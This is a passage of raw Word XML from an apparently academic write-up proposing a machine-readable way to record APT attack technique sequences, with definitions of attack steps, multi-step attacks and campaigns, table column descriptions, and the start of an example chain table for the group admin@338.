          <w:p w14:paraId="3A3108EA" w14:textId="4CABC173" w:rsidR="005B7274" w:rsidRDefault="002D49A8" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B7274" w:rsidRPr="00B857D7" w14:paraId="0B08B16C" w14:textId="77777777" w:rsidTr="00880853">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61C0324F" w14:textId="51519067" w:rsidR="005B7274" w:rsidRDefault="005B7274" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2556E2A2" w14:textId="2A04D127" w:rsidR="005B7274" w:rsidRDefault="00356949" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Date of attack. </w:t>
            </w:r>
            <w:r w:rsidR="005B7274">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To give some sense of currency on information</w:t>
            </w:r>
            <w:r w:rsidR="003D46DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>. A granularity of year will be used.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="114123D7" w14:textId="4B9A65B9" w:rsidR="005B7274" w:rsidRDefault="00356949" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Matching attack fragments may favour recent attacks over older attacks </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35F0F73D" w14:textId="77777777" w:rsidR="005B7274" w:rsidRPr="00A172DC" w:rsidRDefault="005B7274" w:rsidP="005B7274"/>
    <w:p w14:paraId="1B5B6289" w14:textId="6EB43F03" w:rsidR="00E5642C" w:rsidRDefault="00E5642C" w:rsidP="00E5642C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc153480831"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t>Machine Readable Attack Technique Sequences</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D730DB0" w14:textId="75D78E2F" w:rsidR="00E5642C" w:rsidRDefault="00E5642C" w:rsidP="00E5642C">
      <w:r>
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r w:rsidR="003351EF">
        <w:t>define</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> three </w:t>
      </w:r>
      <w:r w:rsidR="001D46A4">
        <w:t xml:space="preserve">major components </w:t>
      </w:r>
      <w:r>
        <w:t>of an attacker’s strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48573062" w14:textId="15C2B05B" w:rsidR="001D46A4" w:rsidRDefault="001D46A4" w:rsidP="00E5642C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>An attack against a specific target, made up of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE1513B" w14:textId="2B431A5D" w:rsidR="00E5642C" w:rsidRDefault="00E5642C" w:rsidP="001D46A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A specific attack ‘step’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6E78E9" w14:textId="10B29374" w:rsidR="001D46A4" w:rsidRDefault="00E5642C" w:rsidP="001D46A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>An attack ‘step’ moves through some or all of the elements</w:t>
      </w:r>
      <w:r w:rsidR="001D46A4">
        <w:t xml:space="preserve"> of the LMKC</w:t>
      </w:r>
      <w:r w:rsidR="008C066D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39960228" w14:textId="16A60B29" w:rsidR="00E5642C" w:rsidRDefault="001D46A4" w:rsidP="001D46A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>It terminates at the point of lateral movement (distinguish from pivot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B06EAD9" w14:textId="781E6F05" w:rsidR="001D46A4" w:rsidRDefault="001D46A4" w:rsidP="001D46A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A complete attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42961724" w14:textId="3C3D151C" w:rsidR="001D46A4" w:rsidRDefault="001D46A4" w:rsidP="001D46A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>May be composed of multiple steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5FAA2B" w14:textId="2FCD7A7E" w:rsidR="001D46A4" w:rsidRDefault="001D46A4" w:rsidP="001D46A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A campaign</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E10631" w14:textId="18CD76CC" w:rsidR="001D46A4" w:rsidRDefault="0074629A" w:rsidP="001D46A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A set of related attacks performed by the same attacker</w:t>
      </w:r>
      <w:r w:rsidR="00C0227D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D532B4E" w14:textId="22BD3C04" w:rsidR="00C0227D" w:rsidRDefault="00C0227D" w:rsidP="001A286E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For example in </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="008E7C50">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1080/01402390.2020.1732354","ISSN":"1743937X","abstract":"While much focus has remained on the concept of cyberwar, what we have been observing in actual cyber behaviour are campaigns comprised of linked cyber operations, with the specific objective of achieving strategic outcomes without the need of armed attack. These campaigns are not simply transitory clever tactics, but strategic in intent. This article examines strategic cyber competition and reveals how the adoption of a different construct can pivot both explanation and policy prescription. Strategy must be unshackled from the presumption that it deals only with the realm of coercion, militarised crisis, and war in cyberspace.","author":[{"dropping-particle":"","family":"Harknett","given":"Richard J.","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Smeets","given":"Max","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Journal of Strategic Studies","id":"ITEM-1","issue":"4","issued":{"date-parts":[["2022"]]},"page":"534-567","publisher":"Routledge","title":"Cyber campaigns and strategic outcomes","type":"article-journal","volume":"45"},"uris":["http://www.mendeley.com/documents/?uuid=414f0632-d23e-42a1-893b-6adfdfd90abe"]}],"mendeley":{"formattedCitation":"(Harknett &amp; Smeets, 2022)","plainTextFormattedCitation":"(Harknett &amp; Smeets, 2022)","previouslyFormattedCitation":"(Harknett &amp; Smeets, 2022)"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00C0227D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>(Harknett &amp; Smeets, 2022)</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we have “While much focus has remained on the concept of cyberwar, what we have been observing in actual cyber behaviour are campaigns comprised of linked cyber operations, with the specific objective of achieving strategic outcomes without the need </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>of armed attack”</w:t>
      </w:r>
      <w:r w:rsidR="003B04B9">
        <w:t xml:space="preserve"> and “A cyber campaign refers to a series of coordinated cyber operations, which take place over time, to achieve a cumulative outcome leading to strategic advantage.</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003B04B9">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C31E3BF" w14:textId="77777777" w:rsidR="00A97658" w:rsidRDefault="00A97658" w:rsidP="00F200CC"/>
    <w:p w14:paraId="1E9C360A" w14:textId="7212DAF6" w:rsidR="00F200CC" w:rsidRDefault="00F200CC" w:rsidP="00F200CC">
      <w:r>
        <w:t xml:space="preserve">We define an approach for recording </w:t>
      </w:r>
      <w:r w:rsidR="00A97658">
        <w:t>the sequence of the techniques used by attackers in such a way that they become machine readable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DE9D19" w14:textId="17B0FEC7" w:rsidR="00A97658" w:rsidRDefault="00A97658" w:rsidP="00F200CC">
      <w:r>
        <w:t xml:space="preserve">This is </w:t>
      </w:r>
      <w:r w:rsidR="003351EF">
        <w:t xml:space="preserve">then </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">validated against over thirty examples of </w:t>
      </w:r>
      <w:r w:rsidR="003351EF">
        <w:t xml:space="preserve">technique sequences used in </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">APT </w:t>
      </w:r>
      <w:r w:rsidR="003351EF">
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>ttack</w:t>
      </w:r>
      <w:r w:rsidR="003351EF">
        <w:t xml:space="preserve"> Steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B52DDD" w14:textId="212AE93F" w:rsidR="00A97658" w:rsidRDefault="00A97658" w:rsidP="00F200CC">
      <w:r>
        <w:t xml:space="preserve">We then show how these individual </w:t>
      </w:r>
      <w:r w:rsidR="00362711">
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ttack </w:t>
      </w:r>
      <w:r w:rsidR="00362711">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">teps can be linked to document </w:t>
      </w:r>
      <w:r w:rsidR="003351EF">
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>ulti-</w:t>
      </w:r>
      <w:r w:rsidR="003351EF">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tep </w:t>
      </w:r>
      <w:r w:rsidR="003351EF">
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>ttacks</w:t>
      </w:r>
      <w:r w:rsidR="003351EF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035EA84A" w14:textId="61838A8C" w:rsidR="00A97658" w:rsidRDefault="00A97658" w:rsidP="00F200CC">
      <w:r>
        <w:t>Finally</w:t>
      </w:r>
      <w:r w:rsidR="003351EF">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we show how these can all be linked and used to document </w:t>
      </w:r>
      <w:r w:rsidR="00362711">
        <w:t xml:space="preserve">technique sequences across </w:t>
      </w:r>
      <w:r w:rsidR="003351EF">
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>ampaigns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004D82A2" w14:textId="38993048" w:rsidR="00A5319A" w:rsidRDefault="00A5319A" w:rsidP="00F200CC"/>
    <w:p w14:paraId="2674C871" w14:textId="77777777" w:rsidR="003168F8" w:rsidRDefault="003168F8" w:rsidP="003168F8">
      <w:r>
        <w:t>An example of the refined attack model is shown below. The colouring is used as an indicator to show which techniques are present in the ATT&amp;CK APT descriptions. The full set of attacks is shown in the Appendix below with additional explanation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693A505E" w14:textId="77777777" w:rsidR="003168F8" w:rsidRDefault="003168F8" w:rsidP="003168F8">
      <w:r>
        <w:t>Here we have</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2A24A0" w14:textId="77777777" w:rsidR="003168F8" w:rsidRDefault="003168F8" w:rsidP="003168F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00C31A7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ID </w:t>
      </w:r>
      <w:r>
        <w:t>– Used to identify the step sequence number.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CBFF57" w14:textId="77777777" w:rsidR="003168F8" w:rsidRDefault="003168F8" w:rsidP="003168F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00C31A7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tactic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – The tactic identified for the relevant technique (this may be NULL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310F9821" w14:textId="77777777" w:rsidR="003168F8" w:rsidRDefault="003168F8" w:rsidP="003168F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00C31A7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pred</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Predecessor (used to allow information ‘G’ steps to be included).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4BF691" w14:textId="77777777" w:rsidR="003168F8" w:rsidRDefault="003168F8" w:rsidP="003168F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31A7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tinc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – Time Increment (not used currently but intended to support future analysis of potential timing patterns in attacks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033EE495" w14:textId="77777777" w:rsidR="003168F8" w:rsidRDefault="003168F8" w:rsidP="003168F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00C31A7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S/G</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – An action taken is represented as a step (S). General information associated with a step is represented with a G.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED3DBAF" w14:textId="77777777" w:rsidR="003168F8" w:rsidRDefault="003168F8" w:rsidP="003168F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00C31A7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>KC Step</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – At this time this is populated with appropriate elements of the Unified Kill Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409F7ADB" w14:textId="77777777" w:rsidR="003168F8" w:rsidRDefault="003168F8" w:rsidP="003168F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00C31A7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Notes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Reference to source material/justification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4138E978" w14:textId="77777777" w:rsidR="003168F8" w:rsidRDefault="003168F8" w:rsidP="003168F8"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1893"/>
        <w:gridCol w:w="2408"/>
        <w:gridCol w:w="661"/>
        <w:gridCol w:w="699"/>
        <w:gridCol w:w="557"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="2126"/>
      </w:tblGrid>
      <w:tr w:rsidR="003168F8" w:rsidRPr="002D1D50" w14:paraId="430E1031" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3F616621" w14:textId="77777777" w:rsidR="003168F8" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1697C90C" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="580888A8" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>admin@338_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5A6F70D1" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0047EF53" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="62B4FE1E" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5485C33A" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2A9F79BD" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003168F8" w:rsidRPr="002D1D50" w14:paraId="43842ACA" w14:textId="77777777" w:rsidTr="00EE0C91">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D8FFB0D" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="679ECDA1" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52438443" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0335D1F7" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42C4991E" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B32EA12" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B4A7AAC" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3350F2ED" w14:textId="77777777" w:rsidR="003168F8" w:rsidRPr="002D1D50" w:rsidRDefault="003168F8" w:rsidP="00EE0C91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
